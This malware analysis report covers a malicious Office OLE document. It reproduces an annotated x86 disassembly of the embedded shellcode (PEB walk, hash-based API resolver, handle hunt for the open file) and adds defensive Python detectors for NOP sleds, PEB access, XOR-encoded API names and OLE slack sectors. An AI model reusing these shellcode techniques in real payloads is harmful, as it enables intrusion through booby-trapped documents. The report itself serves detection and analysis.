Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1fddf8028d7022e…

MALICIOUS

Office (OLE)

Size: 125.5 KB (128,496 bytes) · Created: 2006-01-25 08:30:00 · Authoring application: Microsoft Office Word · First seen: 2014-03-27
MD5: d53019c7ff0329533b93aef092826a54
SHA-1: 7e76a488dcc165a7078f279a1fa845fb478ec776
SHA-256: a1fddf8028d7022e34b6e42aae466761b7b2e9e461f04fc4049733b45d72c64a
Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution; T1566.001 Spearphishing Attachment

The sample is an OLE compound file that carries raw x86 shellcode in its unallocated sector slack. The heuristics attribute delivery to the CVE-2011-1269 / MS11-036 PowerPoint memory-corruption family, but that attribution is heuristic rather than proven: the file's authoring-application metadata says Microsoft Office Word (and its creation timestamp predates the CVE by five years, which only shows how little document metadata is worth), the EPRINT/EMF rule names no malformed graphics record, and every rule matched on the payload, not on the parser trigger. The shellcode traits themselves are unambiguous: a NOP sled, a PEB walk through fs:[0x30] into the loader's module list, a 12-entry hash-based import resolver, and Windows API names XOR-encoded with 0xFF (a bitwise complement, which defeats string scanning and nothing else). The resolver listing also computes 0x117e8 + 0xde08 = 0x1f5f0 = 128,496, exactly this file's size, then calls a resolved API with (candidate handle, NULL) for handles 4, 8, 0xc, ... up to 0x10000 and compares the return value with that constant. This is consistent with the classic handle hunt in which document shellcode brute-forces handle values until a size query matches the open document, so it can read the rest of the payload from the file itself (the specific API is not identified on this page). That in turn is why the payload lives in the 52% of the file that the OLE structure does not account for: oversized slack is the standard hiding place for such stages.
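The shellcode traits the summary lists (NOP sled, fs:[0x30] PEB access, API names XOR-encoded with a single byte) can be checked with a few byte-level rules. The following is an added illustration, not code from the tool that produced this report. It runs over a small blob constructed inline (filler, a 24-byte NOP sled, the prologue bytes from the listing below, and three of the reported API names XORed with 0xFF), brute-forces all 256 single-byte keys instead of assuming 0xFF, and reports file offsets so each hit can be cross-referenced in a disassembler. The API name list is the one reported on this page; the sample blob and its offsets are constructed for the demonstration.

```python
import re
from typing import List, Tuple

# Library/API names the report found XOR-encoded with key 0xFF.
API_NAMES = [b"KERNEL32.DLL", b"iphlpapi.dll", b"LoadLibraryA", b"GetProcAddress",
             b"ExitProcess", b"CreateFileA", b"OpenProcess", b"ShellExecuteA"]

# mov eax, fs:[0x30]  (64 a1 30 00 00 00)  or  mov r32, fs:[0x30]  (64 8b /r 30 00 00 00)
PEB_ACCESS = re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR. With key 0xFF this is just a bitwise complement."""
    return bytes(b ^ key for b in data)


def find_nop_sleds(buf: bytes, min_len: int = 20) -> List[Tuple[int, int]]:
    """(offset, length) of every run of at least min_len consecutive 0x90 bytes."""
    pat = re.compile(rb"\x90{%d,}" % min_len)
    return [(m.start(), m.end() - m.start()) for m in pat.finditer(buf)]


def find_peb_access(buf: bytes) -> List[int]:
    """Offsets of x86 'mov r32, fs:[0x30]' encodings (TEB -> PEB read)."""
    return [m.start() for m in PEB_ACCESS.finditer(buf)]


def find_xor_encoded_apis(buf: bytes, names=API_NAMES) -> List[Tuple[int, int, str]]:
    """Brute-force every single-byte key; key 0 hits mean the name is in plaintext.
    Returns (offset, key, name) tuples sorted by offset."""
    hits = []
    for key in range(256):
        for name in names:
            needle = xor_bytes(name, key)
            pos = buf.find(needle)
            while pos != -1:
                hits.append((pos, key, name.decode()))
                pos = buf.find(needle, pos + 1)
    return sorted(hits)


def scan(buf: bytes) -> dict:
    """Run all three heuristics and return their hits keyed by rule name."""
    return {"nop_sleds": find_nop_sleds(buf),
            "peb_access": find_peb_access(buf),
            "xor_apis": find_xor_encoded_apis(buf)}


# Constructed test blob (not bytes taken from the sample): 16 bytes of filler, a 24-byte
# NOP sled at offset 16, the PEB-walk prologue from the report's listing at offset 40,
# 8 filler bytes, then three NUL-terminated API names XORed with 0xFF starting at offset 64.
PEB_PROLOGUE = bytes.fromhex("64a130000000" "8b400c" "8b701c" "ad" "8b7008")
SAMPLE = (b"\x00" * 16 + b"\x90" * 24 + PEB_PROLOGUE + b"\x41" * 8
          + b"".join(xor_bytes(n + b"\x00", 0xFF)
                     for n in (b"KERNEL32.DLL", b"LoadLibraryA", b"GetProcAddress"))
          + b"\x00" * 8)

if __name__ == "__main__":
    for rule, hits in scan(SAMPLE).items():
        print(rule, hits)
```

Because the key search is exhaustive, a hit with any key other than 0xFF on a real file is still reportable, and a plaintext (key 0) hit for the same names is the cheaper signal to check first. The PEB pattern only covers the direct fs:[0x30] form; shellcode that loads fs:[0x18] (the TEB) first and then reads PEB at +0x30 will not match it.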

Heuristics (8)

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is corroborating Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • XOR-encoded strings (key 0xFF) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0xFF: 'KERNEL32.DLL', 'iphlpapi.dll', 'LoadLibraryA', 'GetProcAddress', 'ExitProcess', 'CreateFileA', 'OpenProcess', 'ShellExecuteA'. XOR with 0xFF is a bitwise complement, so it defeats only naive string scanning. LoadLibraryA/GetProcAddress are the usual bootstrap pair for resolving everything else by name, and iphlpapi.dll (the IP Helper API) is an unusual import for a document payload and worth following in dynamic analysis.
    Disassembly hidden — these bytes score as data, not coherent x86 code (no internal branches to corroborate control flow).
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly hidden — these bytes score as data, not coherent x86 code (3/4 branch targets land on an instruction boundary (75% coherence)).
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    Reads the PEB through fs:[0x30], follows PEB->Ldr to InInitializationOrderModuleList and takes the second entry's DllBase as the module base handed to the hash resolver (see the listing). Taking the second entry yields kernel32.dll on Windows XP/2003 but kernelbase.dll on Windows 7 and later, a pre-Win7 shellcode idiom consistent with the MS11-036 era.
    Disassembly
    x86 disassembly · validity: uncertain (0.675) — 3/6 branch targets land on an instruction boundary (50% coherence)
    00000B59  64a130000000      mov eax, dword ptr fs:[0x30]          ; eax = PEB
    00000B5F  8b400c            mov eax, dword ptr [eax + 0xc]        ; eax = PEB->Ldr
    00000B62  8b701c            mov esi, dword ptr [eax + 0x1c]       ; esi = Ldr->InInitializationOrderModuleList.Flink (ntdll entry)
    00000B65  ad                lodsd eax, dword ptr [esi]            ; eax = next entry (kernel32 on XP/2003, kernelbase on Win7+)
    00000B66  8b7008            mov esi, dword ptr [eax + 8]          ; esi = entry->DllBase (8 bytes past the InInitOrder links)
    00000B69  81ec00070000      sub esp, 0x700                        ; 0x700 bytes of scratch space
    00000B6F  8bec              mov ebp, esp                          ; ebp = base of the resolved-API table
    00000B71  e912010000        jmp 0xc88                             ; stub at 0xc88 is expected to call back to 0xb76 (call/pop; not in listing)
    00000B76  5b                pop ebx                               ; ebx = address of the API hash table
    00000B77  33c9              xor ecx, ecx
    00000B79  b10c              mov cl, 0xc                           ; 12 hashes to resolve (byte-sized move avoids NUL bytes)
    00000B7B  56                push esi                              ; arg: module base
    00000B7C  ff33              push dword ptr [ebx]                  ; arg: 32-bit API hash
    00000B7E  e8a3000000        call 0xc26                            ; hash resolver (body not in listing)
    00000B83  89448d00          mov dword ptr [ebp + ecx*4], eax      ; store address; ecx runs 12..1 so slots are ebp+0x30 down to ebp+0x4
    00000B87  83ebfc            sub ebx, -4                           ; ebx += 4: next hash
    00000B8A  e2ef              loop 0xb7b
    00000B8C  33f6              xor esi, esi                          ; esi = 0
    00000B8E  bfe8170100        mov edi, 0x117e8
    00000B93  c7455408de0000    mov dword ptr [ebp + 0x54], 0xde08
    00000B9A  037d54            add edi, dword ptr [ebp + 0x54]       ; edi = 0x117e8 + 0xde08 = 0x1f5f0 = 128,496 = this file's size
    00000B9D  897558            mov dword ptr [ebp + 0x58], esi       ; candidate handle = 0
    00000BA0  83455804          add dword ptr [ebp + 0x58], 4         ; next candidate: 4, 8, 0xc, ...
    00000BA4  56                push esi                              ; arg 2: NULL
    00000BA5  ff7558            push dword ptr [ebp + 0x58]           ; arg 1: candidate handle
    00000BA8  ff552c            call dword ptr [ebp + 0x2c]           ; second resolved API (the slot stored when ecx == 11)
    00000BAB  3bc7              cmp eax, edi                          ; returned value == file size?
    00000BAD  740b              je 0xbba                              ; yes: handle to the open document found
    00000BAF  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000   ; give up once the candidate reaches 0x10000
    00000BB6  7432              je 0xbea
    00000BB8  eb                .byte 0xeb                            ; opcode of a short jmp; the listing ends before its displacement byte
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by a hash-based import resolver: 12 dword hashes are passed one by one, together with the module base, to a routine at 0xc26, which is the position-independent shellcode import pattern. The hash routine's body is not in the listing, so "ROR13-style" is the rule's assumption about that routine rather than something confirmed from these bytes.
    Disassembly: identical to the listing under SC_PEB_ACCESS above (0xB59 to 0xBB8).
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 128,496 bytes but its declared streams total only 61,092 bytes; 67,404 bytes (52%) are not accounted for by any stream. This figure is file size minus declared stream sizes, so it also counts the header, FAT and directory sectors and per-sector rounding; the sectors the FAT marks free are the part worth carving. Unallocated sectors are the canonical hiding place for macro-free Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
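The OLE_SLACK_ANOMALY figure above is file size minus the sum of declared stream sizes, which lumps the header, FAT and directory sectors and per-sector rounding in with genuinely unallocated sectors. As an added example (not part of this report or the tool that produced it), the following minimal [MS-CFB] reader computes both that naive figure and the sectors the FAT actually marks FREESECT, and carves those sectors out so they can be fed to shellcode heuristics. It is exercised on a compound file constructed inline (one 4,100-byte stream in sectors 2 to 10, followed by six free sectors of 0x90 filler), not on the sample itself; the stream name and sizes are assumptions of the demonstration.

```python
import struct
from typing import Dict, List, Tuple

MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, ENDOFCHAIN, FATSECT, NOSTREAM = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF
STREAM, ROOT = 2, 5


def _u32s(data: bytes) -> List[int]:
    return list(struct.unpack("<%dI" % (len(data) // 4), data))


def parse_cfb(buf: bytes) -> dict:
    """Minimal [MS-CFB] reader: header, FAT (through the DIFAT) and directory entries."""
    if buf[:8] != MAGIC:
        raise ValueError("not an OLE compound file")
    major, = struct.unpack_from("<H", buf, 0x1A)
    sector = 1 << struct.unpack_from("<H", buf, 0x1E)[0]
    n_fat, first_dir = struct.unpack_from("<II", buf, 0x2C)
    first_difat, n_difat = struct.unpack_from("<II", buf, 0x44)

    def sec(i: int) -> bytes:                      # sector i starts one sector past the header
        return buf[(i + 1) * sector:(i + 2) * sector]

    difat = _u32s(buf[0x4C:0x4C + 109 * 4])        # first 109 FAT sector numbers live in the header
    s = first_difat
    for _ in range(n_difat):                       # extra DIFAT sectors only appear in large files
        if s in (ENDOFCHAIN, FREESECT):
            break
        entries = _u32s(sec(s))
        difat.extend(entries[:-1])
        s = entries[-1]                            # last entry chains to the next DIFAT sector
    fat: List[int] = []
    for fs in difat[:n_fat]:
        if fs == FREESECT:
            break
        fat.extend(_u32s(sec(fs)))

    streams: List[Tuple[str, int, int]] = []       # (name, start sector, declared size)
    d, seen = first_dir, set()
    while d not in (ENDOFCHAIN, FREESECT) and d not in seen and d < len(fat):
        seen.add(d)                                # guard against FAT loops in malformed files
        chunk = sec(d)
        for off in range(0, len(chunk) - 127, 128):
            name_len, etype = struct.unpack_from("<HB", chunk, off + 0x40)
            if etype != STREAM:                    # root (5) owns the mini stream; storages (1) hold no data
                continue
            name = chunk[off:off + max(name_len - 2, 0)].decode("utf-16-le", "replace")
            start, = struct.unpack_from("<I", chunk, off + 0x74)
            size, = struct.unpack_from("<Q" if major == 4 else "<I", chunk, off + 0x78)
            streams.append((name, start, size))
        d = fat[d]
    return {"sector": sector, "fat": fat, "streams": streams}


def slack_report(buf: bytes) -> Dict[str, object]:
    """Naive 'file size minus declared streams' next to the bytes in FAT-free or uncovered sectors."""
    info = parse_cfb(buf)
    sector, fat = info["sector"], info["fat"]
    file_size = len(buf)
    declared = sum(size for _, _, size in info["streams"])
    n_sectors = (file_size - sector + sector - 1) // sector
    free_sectors = [i for i in range(n_sectors) if i >= len(fat) or fat[i] == FREESECT]
    unallocated = sum(min(sector, file_size - (i + 1) * sector) for i in free_sectors)
    return {"file_size": file_size, "declared_stream_bytes": declared,
            "naive_slack": file_size - declared, "free_sectors": free_sectors,
            "unallocated_bytes": unallocated}


def carve_free_sectors(buf: bytes) -> bytes:
    """Concatenate the free sectors so they can be handed to a shellcode scanner."""
    sector = 1 << struct.unpack_from("<H", buf, 0x1E)[0]
    return b"".join(buf[(i + 1) * sector:(i + 2) * sector]
                    for i in slack_report(buf)["free_sectors"])


def build_sample_cfb() -> bytes:
    """Constructed v3 compound file (not the sample's bytes): sector 0 = FAT, sector 1 = directory,
    sectors 2-10 = a 4,100-byte 'WordDocument' stream, sectors 11-16 = FREESECT filled with 0x90."""
    S = 512
    hdr = bytearray(S)
    hdr[0:8] = MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)          # minor, major, byte order, shifts
    struct.pack_into("<8I", hdr, 0x28, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN)  # 1 FAT sector, dir at 1
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))          # DIFAT: FAT lives in sector 0
    fat = [FREESECT] * (S // 4)
    fat[0], fat[1] = FATSECT, ENDOFCHAIN
    for i in range(2, 10):
        fat[i] = i + 1                                                      # stream chain 2 -> ... -> 10
    fat[10] = ENDOFCHAIN

    def entry(name: str, etype: int, child: int, start: int, size: int) -> bytes:
        e = bytearray(128)
        nb = name.encode("utf-16-le") + b"\x00\x00"
        e[0:len(nb)] = nb
        struct.pack_into("<HBB", e, 0x40, len(nb), etype, 1)
        struct.pack_into("<III", e, 0x44, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 0x74, start, size)
        return bytes(e)

    dir_sec = (entry("Root Entry", ROOT, 1, ENDOFCHAIN, 0)
               + entry("WordDocument", STREAM, NOSTREAM, 2, 4100) + bytes(256))
    stream = b"W" * 4100 + bytes(9 * S - 4100)
    return bytes(hdr) + struct.pack("<128I", *fat) + dir_sec + stream + b"\x90" * (6 * S)


if __name__ == "__main__":
    print(slack_report(build_sample_cfb()))
```

On the constructed file the naive figure is 5,116 bytes while only 3,072 bytes sit in FREESECT sectors; the remainder is the header, FAT and directory sectors (1,536 bytes) plus the 508-byte tail of the stream's last sector. The free-sector list is the useful output, because it says where to carve, and the carved bytes are what should be scanned for the NOP sled, PEB access and XOR-encoded strings reported above.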